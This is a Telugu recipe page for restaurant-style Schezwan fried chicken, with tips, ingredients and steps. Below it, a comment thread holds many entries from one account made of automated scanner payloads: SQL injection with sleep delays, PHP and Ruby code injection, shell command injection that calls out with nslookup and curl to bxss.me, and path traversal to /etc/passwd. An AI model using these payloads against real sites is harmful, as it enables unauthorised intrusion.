నేను చాలా ఎక్కువగా ఇష్టంగా తినే స్టార్టర్ల లో షేజ్వాన్ ఫ్రైడ్ చికెన్ కూడా ఒకటి. వెజ్ ఫ్రైడ్ రైస్ షేజ్వాన్ చికెన్ ఉంటె వీకెండ్స్ కి ఏ స్పెషల్ రెసిపీ కూడా అవసరం లేదు ఫుల్ మీల్ రెడీ అనిపిస్తుంది నాకు.

ఫ్రైడ్ చికెన్ అనగానే చాలా టైం పడుతుంది అనుకుంటారు, కానీ ఈ షేజ్వాన్ చికెన్ చాలా ఈసీ. చికెన్ని లైట్ గోల్డెన్ కలర్లోకి ఫ్రై చేసి సాసుల్లో టాస్ చేస్తే స్పైసీ ఫ్రైడ్ చికెన్ రెడీ.

చికెన్ ఫ్రై అందరూ చేస్తారు కానీ, చికెన్ నూనె లో వేగినా బయట క్రంచీగా ఉండాలి లోపల జ్యూసీగా ఉండాలి, సాసులు- ఫ్లేవర్స్ అన్నీ లోపలి దాకా వెళ్ళాలి అది సరైన చికెన్ ఫ్రై అంటే. అవన్నీ రావాలంటే ఎలాగో వీడియో లో చాలా వివరంగా ఉంది.

పర్ఫెక్ట్ రెస్టారెంట్ స్టైల్ షేజ్వాన్ చికెన్ చాలా సింపుల్. కానీ, చాలా ముఖ్యమైన స్టెప్స్ కొన్ని ఉన్నాయ్ కాబట్టిచేసే ముందు కింద టిప్స్ చుడండి.

Schzewan Fried Chicken | How to make Schzewan Fried Chicken Recipe

టిప్స్

బోన్స్ చికెన్ వాడొచ్చా:

• ఈ రెసిపీ సహజంగా బోన్లెస్ చికెన్ తో చేస్తారు, నచ్చితే బోన్తో ఉన్న చికెన్ కూడా వాడుకోవచ్చు. నేను బోన్లెస్ వాడను. బోన్ వాడితే చికెన్ని ఎర్రగా వేపుకోవాలి

• బోన్లెస్ చికెన్ ముక్కలు కాస్త పెద్దగా ఉండాలి లేదంటే నూనెలో వేగేప్పటికి ఇంకా చిన్న ముక్కలు అవుతాయ్ తినేందుకు అంత రుచిగా ఉండదు.

చికెన్ జ్యూసి గా ఉండాలంటే:

• చికెన్కి కోటింగ్ ఇచ్చే ముందు 30 నిమిషాల పాటు 2 tsp ఉప్పేసిన నీళ్ళలో చికెన్ నానబెడితే చికెన్ బాగా సాఫ్ట్ అవుతుంది, సాసుల్లలో వేగాక ఫ్లేవర్స్ లోపలిదాకా వెళతాయ్.

• చికెన్ సుమారు 1.5kg ఉన్నది లేదా అంతకంటే తక్కువ ఉన్న కోడి తీసుకోండి, లేదంటే రబ్బర్లా సాగుతుంది

కోటింగ్ ఎందుకు విడిపోతుంది:

• కోటింగ్ ఎప్పుడూ గట్టిగా ఉండాలి, లేదంటే నూనెలో వేయగానే కొంత కోటింగ్ పోతుంది అంత క్రిస్పీగా వేగదు చికెన్.

• కోటింగ్కి కార్న్ ఫ్లోర్ కి బదులు లేదా మైదా కి బదులు బియ్యం పిండి వాడుకోవచ్చు. బియ్యంపిండి వల్ల చికెన్ క్రిస్పీగా అయితే ఉంటుంది. కానీ, సాసులు చికెన్ లోపలి చేరవు.

రెస్టారంట్ టేస్ట్ కోసం ఏమి చేయాలి:

చైనీస్ ఎప్పుడూ హై ఫ్లేం మీద టాస్ చేయాలి అప్పుడే స్మోకీ ఫ్లేవర్ వస్తుంది, దాని వల్లే రెస్టారెంట్ టెస్ట్ వస్తుంది. ఇంకా రుచి చూసుకుంటూ ఉప్పు కారాలు తగినట్లు వేసుకోవాలి.

బెస్ట్ షేజ్వాన్ ఫ్రైడ్ చికెన్ కోసం కొన్ని టిప్స్:

• ఒక్కోరిది ఒక్కో రుచి, కాబట్టి షేజ్వాన్ సాస్ మీకు తగినట్లుగా మార్చుకోండి. కానీ షేజ్వాన్ చికెన్ అంటే కారంగానే ఉండాలి మరి.

• షేజ్వాన్ చికెన్ అంటే కచ్చితంగా అనాసపువ్వు పొడి వేసి తీరాలి.

• సాసులు సగం పైన మరిగి చిక్కబడుతుంది అప్పుడు చికెన్ వేసి హై ఫ్లేం మీద బాగా టాస్ చేస్తేనే చికెన్ క్రిస్పీగా ఉంటుంది ఫ్లేవర్స్ బాగా పడతాయి.

• సాసులు పూర్తిగా డ్రై అయ్యేదాకా చికెన్ టాస్ చేయకండి, ఇంకా కాస్త సాస్ మిగిలుండగానే దింపేయాలి లేదంటే చల్లారుతున్న కొద్దీ గట్టిగా అయిపోతుంది.

షేజ్వాన్ ఫ్రైడ్ చికెన్ - రెసిపీ వీడియో

Schzewan Fried Chicken | How to make Schzewan Fried Chicken Recipe | Szechuan Chicken

Chinese Non-Veg Recipes | nonvegetarian
  • Prep Time 5 mins
  • Cook Time 20 mins
  • Total Time 25 mins
  • Servings 4

కావాల్సిన పదార్ధాలు

  • చికెన్ కోటింగ్ కోసం
  • 300 gms బోన్లెస్ చికెన్
  • ఉప్పు
  • 2 tsp గిలకొట్టిన గుడ్డు
  • 2 tsp మైదా
  • 2 tsp కార్న్ ఫ్లోర్
  • 1 tbsp నీళ్ళు
  • నూనె వేపుకోడానికి
  • చికెన్ టాస్ చేయడానికి
  • 3 tsp నూనె
  • 4 ఎండు మిర్చి
  • 4 వెల్లూలి తరుగు
  • 1 tbsp అల్లం సన్నని తరుగు
  • 2.5 tbsp షేజ్వాన్ సాస్
  • 1/2 tsp ఆరోమతిక్ పౌడర్
  • 1/2 tsp వైట్ పెప్పర్ పౌడర్
  • 3/4 tsp మిరియాల పొడి
  • 1/8 tsp పంచదార
  • ఉప్పు
  • 3/4 tsp అనాసపువ్వు పొడి
  • 3/4 tsp డార్క్ సోయా సాస్
  • 1/3 cup నీళ్ళు
  • 2 tbsps ఉల్లి కాడల తరుగు

విధానం

  1. బోన్లెస్ చికెన్ లో ఉప్పు, గుడ్డు కార్న్ ఫ్లోర్ మైదా వేసి బాగా కోట్ చేసుకోవాలి. అవసరమైతే కాస్త నీళ్ళు వేసుకోండి.
  2. వేడి నూనెలో కోట్ చేసుకున్న చికెన్ వేసి పైనా కోటింగ్ క్రిస్పీగా లైట్ గోల్డెన్ కలర్ వచ్చేదాకా వేపి తీసుకోండి.
  3. సాస్ పాన్ లో నూనె వేడి చేసి అందులో ఎండుమిర్చి, వెల్లూలి, అల్లం తరుగు వేసి హై ఫ్లేం మీద వేపుకోవాలి.
  4. వెల్లూలి వేగాక షేజ్వాన్ సాస్, ఆరోమేటిక్ పౌడర్ తో పాటు మిగిలిన సాసులు అన్నీ వేసి హై ఫ్లేం మీద టాస్ చేసుకోవాలి.
  5. సాసులు వేగాక నీళ్ళు పోసి హై ఫ్లేం మీద సగంయ్యేదాక మరిగించాలి.
  6. మరిగిన సాసులో వేపిన చికెన్ ముక్కలు వేసి హై ఫ్లేం మీద టాస్ చేయాలి. ఇంకా సాస్ కాస్త మిగిలుండగానే ఉల్లికాడల తరుగు వేసి టాస్ చేసి దిమ్పెసుకోవాలి.

Leave a comment

Rate this Recipe:
Your email address will not be published.

95 comments

  • S
    Sushil Kumar Rachuri
    Recipe Rating:
    I enjoyed it fourth time
  • S
    Sushil Kumar Rachuri
    Recipe Rating:
    We whole family enjoyed it once again. Thanks
  • S
    Sushil Kumar Rachuri
    Recipe Rating:
    Unbelievable! I have done it! I got the taste of Chinese taste. My family members liked it very much. Thanks for educating us in cooking.
  • S
    Srinivas Jammugani
    Sooper anthe
  • P
    Prakyath Arcot
    Recipe Rating:
    To be Frank, I enjoy watching every single you upload sir. You have really great cooking skills. Thank you.
  • P
    Prakyath Arcot
    Recipe Rating:
    Hello! Vismai Food, really sir you have a great cooking skills and you delivery very pleasant homely voice over to your videos. I love it sir. Thank you.
    • K
      kEMlzpAX
      Recipe Rating:
      1????%2527%2522\'\"
    • K
      kEMlzpAX
      Recipe Rating:
      @@kMFj7
    • K
      kEMlzpAX
      Recipe Rating:
      1'"
    • K
      kEMlzpAX
      Recipe Rating:
      1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
    • K
      kEMlzpAX
      Recipe Rating:
      1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
    • K
      kEMlzpAX
      Recipe Rating:
      10ryMJwVs')) OR 936=(SELECT 936 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1MkqH2Wsu') OR 755=(SELECT 755 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1LP2NFHvk' OR 74=(SELECT 74 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1)) OR 475=(SELECT 475 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1) OR 633=(SELECT 633 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 OR 149=(SELECT 149 FROM PG_SLEEP(15))--
    • K
      kEMlzpAX
      Recipe Rating:
      1RWuMJDsQ'; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1 waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1); waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      1-1; waitfor delay '0:0:15' --
    • K
      kEMlzpAX
      Recipe Rating:
      (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
    • K
      kEMlzpAX
      Recipe Rating:
      10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
    • K
      kEMlzpAX
      Recipe Rating:
      10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
    • K
      kEMlzpAX
      Recipe Rating:
      1*if(now()=sysdate(),sleep(15),0)
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 3+609-609-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      -1 OR 2+609-609-1=0+0+0+1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1*1
    • K
      kEMlzpAX
      Recipe Rating:
      1CjJze2is
    • K
      kEMlzpAX
      Recipe Rating:
      [php]print(md5(31337));[/php]
    • K
      kEMlzpAX
      Recipe Rating:
      {php}print(md5(31337));{/php}
    • K
      kEMlzpAX
      Recipe Rating:
      print(md5(31337));//
    • K
      kEMlzpAX
      Recipe Rating:
      '{${print(md5(31337))}}'
    • K
      kEMlzpAX
      Recipe Rating:
      '.print(md5(31337)).'
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}\
    • K
      kEMlzpAX
      Recipe Rating:
      ${@print(md5(31337))}
    • K
      kEMlzpAX
      Recipe Rating:
      ";print(md5(31337));$a="
    • K
      kEMlzpAX
      Recipe Rating:
      ';print(md5(31337));$a='
    • K
      kEMlzpAX
      Recipe Rating:
      ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
    • K
      kEMlzpAX
      Recipe Rating:
      gethostbyname(lc('hitak'.'zgviywoe273e9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(82).chr(103).chr(79)
    • K
      kEMlzpAX
      Recipe Rating:
      ".gethostbyname(lc("hitrr"."voiiajwif8852.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(73).chr(109).chr(72)."
    • K
      kEMlzpAX
      Recipe Rating:
      '.gethostbyname(lc('hitej'.'sspafnur22b2a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(74).chr(113).chr(90).'
    • K
      kEMlzpAX
      Recipe Rating:
      ./1
    • K
      kEMlzpAX
      Recipe Rating:
      ../1
    • K
      kEMlzpAX
      Recipe Rating:
      file:///etc/passwd
    • K
      kEMlzpAX
      Recipe Rating:
      '"
    • K
      kEMlzpAX
      Recipe Rating:
      vismaifood.com
    • K
      kEMlzpAX
      Recipe Rating:
      https://vismaifood.com/
    • K
      kEMlzpAX
      Recipe Rating:
      xfs.bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
    • K
      kEMlzpAX
      Recipe Rating:
      'A'.concat(70-3).concat(22*4).concat(101).concat(71).concat(105).concat(71)+(require'socket' Socket.gethostbyname('hitfx'+'lufewxln3d1a1.bxss.me.')[3].to_s)
    • K
      kEMlzpAX
      Recipe Rating:
      '+'A'.concat(70-3).concat(22*4).concat(106).concat(87).concat(97).concat(84)+(require'socket' Socket.gethostbyname('hittn'+'aanwvnfd8206e.bxss.me.')[3].to_s)+'
    • K
      kEMlzpAX
      Recipe Rating:
      "+"A".concat(70-3).concat(22*4).concat(109).concat(80).concat(103).concat(80)+(require"socket" Socket.gethostbyname("hitam"+"oxcqnmvd2ad39.bxss.me.")[3].to_s)+"
    • K
      kEMlzpAX
      Recipe Rating:
      schzewan-fried-chicken-how-make-schzewan-fried-chicken-recipe-szechuan-chicken/.
    • K
      kEMlzpAX
      Recipe Rating:
      schzewan-fried-chicken-how-make-schzewan-fried-chicken-recipe-szechuan-chicken
    • K
      kEMlzpAX
      Recipe Rating:
      schzewan-fried-chicken-how-make-schzewan-fried-chicken-recipe-szechuan-chicken
    • K
      kEMlzpAX
      Recipe Rating:
      1"||sleep(27*1000)*rrffzq||"
    • K
      kEMlzpAX
      Recipe Rating:
      1'||sleep(27*1000)*rglkaf||'
    • K
      kEMlzpAX
      Recipe Rating:
      1"&&sleep(27*1000)*khwcsp&&"
    • K
      kEMlzpAX
      Recipe Rating:
      1'&&sleep(27*1000)*yfcfcb&&'
    • K
      kEMlzpAX
      Recipe Rating:
      '"()
    • K
      kEMlzpAX
      Recipe Rating:
      ;(nslookup -q=cname hitchqjhjuetk01163.bxss.me||curl hitchqjhjuetk01163.bxss.me)|(nslookup -q=cname hitchqjhjuetk01163.bxss.me||curl hitchqjhjuetk01163.bxss.me)&(nslookup -q=cname hitchqjhjuetk01163.bxss.me||curl hitchqjhjuetk01163.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      `(nslookup -q=cname hitslanxdozae6ecc3.bxss.me||curl hitslanxdozae6ecc3.bxss.me)`
    • K
      kEMlzpAX
      Recipe Rating:
      |(nslookup -q=cname hitofdbbqxqqk500c9.bxss.me||curl hitofdbbqxqqk500c9.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      &(nslookup -q=cname hittuqqvfckbz672cd.bxss.me||curl hittuqqvfckbz672cd.bxss.me)&'\"`0&(nslookup -q=cname hittuqqvfckbz672cd.bxss.me||curl hittuqqvfckbz672cd.bxss.me)&`'
    • K
      kEMlzpAX
      Recipe Rating:
      &nslookup -q=cname hitzlgrambjnf0d11d.bxss.me&'\"`0&nslookup -q=cname hitzlgrambjnf0d11d.bxss.me&`'
    • K
      kEMlzpAX
      Recipe Rating:
      $(nslookup -q=cname hitldecthiupt44bfc.bxss.me||curl hitldecthiupt44bfc.bxss.me)
    • K
      kEMlzpAX
      Recipe Rating:
      ^(#$!@#$)(()))******
    • K
      kEMlzpAX
      Recipe Rating:
      (nslookup -q=cname hitryjkfbpfhob6cfe.bxss.me||curl hitryjkfbpfhob6cfe.bxss.me))
    • K
      kEMlzpAX
      Recipe Rating:
      !(()&&!|*|*|
    • K
      kEMlzpAX
      Recipe Rating:
      1|echo ilxfwb$()\ pvdxzz\nz^xyu||a #' |echo ilxfwb$()\ pvdxzz\nz^xyu||a #|" |echo ilxfwb$()\ pvdxzz\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      |echo luwwje$()\ mdsanh\nz^xyu||a #' |echo luwwje$()\ mdsanh\nz^xyu||a #|" |echo luwwje$()\ mdsanh\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      1&echo wfvxtf$()\ edqdbm\nz^xyu||a #' &echo wfvxtf$()\ edqdbm\nz^xyu||a #|" &echo wfvxtf$()\ edqdbm\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      &echo adljna$()\ voanzg\nz^xyu||a #' &echo adljna$()\ voanzg\nz^xyu||a #|" &echo adljna$()\ voanzg\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      echo eajyxc$()\ gjzgpk\nz^xyu||a #' &echo eajyxc$()\ gjzgpk\nz^xyu||a #|" &echo eajyxc$()\ gjzgpk\nz^xyu||a #
    • K
      kEMlzpAX
      Recipe Rating:
      bxss.me
    • K
      kEMlzpAX
      Recipe Rating:
      c:/windows/win.ini
    • K
      kEMlzpAX
      Recipe Rating:
      ../../../../../../../../../../../../../../etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      /etc/shells
    • K
      kEMlzpAX
      Recipe Rating:
      1&n912164=v907009
    • K
      kEMlzpAX
      Recipe Rating:
      http://bxss.me/t/fit.txt?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      Http://bxss.me/t/fit.txt
    • K
      kEMlzpAX
      Recipe Rating:
      1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
    • K
      kEMlzpAX
      Recipe Rating:
      12345'"\'\");|]*{ ?''💡
    • K
      kEMlzpAX
      Recipe Rating:
      ${9999098+9999917}
    • K
      kEMlzpAX
      Recipe Rating:
      Puac62tl: T9kkhSMV
    • K
      kEMlzpAX
      Recipe Rating:
      A7UDmXyE
    • K
      kEMlzpAX
      Recipe Rating:
      "+response.write(9221686*9491395)+"
    • K
      kEMlzpAX
      Recipe Rating:
      '+response.write(9221686*9491395)+'
    • K
      kEMlzpAX
      Recipe Rating:
      response.write(9221686*9491395)
Schzewan Fried Chicken | How to make Schzewan Fried Chicken Recipe